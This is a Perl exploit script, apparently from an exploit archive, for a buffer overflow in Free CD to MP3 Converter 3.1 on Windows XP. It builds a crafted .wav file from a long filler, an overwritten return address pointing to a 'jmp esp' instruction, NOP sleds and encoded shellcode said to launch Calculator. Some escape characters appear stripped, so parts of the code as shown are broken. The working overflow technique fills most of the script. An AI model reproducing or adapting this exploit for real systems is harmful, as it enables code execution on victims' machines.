#!usr/bin/perl
#Exploit Title: Exploit 0day Buffer Overflow Free CD to MP3 Converter 3.1
#Date: 09112010
#Author: C4SS!0 G0M3S
#Software Link: http://www.eusing.com/Download/cdtomp3freeware.exe
#Version: 3.1
#Tested on: WIN-XP SP3
#
#
#Exploit Writted by C4SS!0 G0M3S
#
#
#Home: http://www.invasao.com.br
#
#
#E-mail: louredo_@hotmail.com
#
#

use IO::File;#import IO:File

system("cls");
system("color 4f");

sub usage
{
sub image
{
print("nn");
print("             ______________n");
print("             <C4SS!0 G0MES>n".
 "             --------------n".
 "                   \   ,__,n".
 "                    \-- (oo)____n".
 "                        (__)    )\n".
 "                           ||--|| nnnn");
 }
 image;
 
print("          [+]Exploit: Buffer Overflow Free CD to MP3 Converternn".
      "          [+]Author: C4SS!0 G0M3Snn".
	  "          [+]Home: http://www.invasao.com.brnn".
	  "          [+]E-mail: Louredo_@hotmail.comnnn".
	  "          [+]Usage: exploit.pl <File to create>n". 
	  "          [+]Exemple: exploit.pl music.wavn");
 }
 
 if($#ARGV != 0)
 {
 usage;
}
else
{
image;

$buffer="x41" x 4112;
$eip=pack('V',0x004D97BB);#Jmp Esp From(cdextact.exe)
#Exec the Calc
$shellcode="xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" .
"x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" .
"x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" .
"x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" .
"x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" .
"xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" .
"xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" .
"x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" .
"xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" .
"xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" .
"x7fxe8x7bxca";
$nops="x90" x 50;

print("          [+]Writing in the Shellcode @ARGV[0] Filenn".
      "          [+]Identifying the Length of the Shellcodenn".
	"	  [+]Length of the Shellcode:".length($shellcode)."nn".
      "          [+]File @ARGV[0] Created Successfullynn");
	
	open(f,">@ARGV[0]");
	print f $buffer.$eip.$nops.$shellcode.$nops;
	close();
    




}